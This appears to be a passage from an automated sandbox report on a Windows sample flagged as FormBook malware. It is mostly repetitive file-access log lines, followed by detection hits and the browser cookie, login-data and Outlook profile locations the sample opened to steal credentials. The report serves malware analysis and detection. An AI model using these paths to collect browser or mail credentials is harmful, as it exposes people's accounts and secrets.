            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\reg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
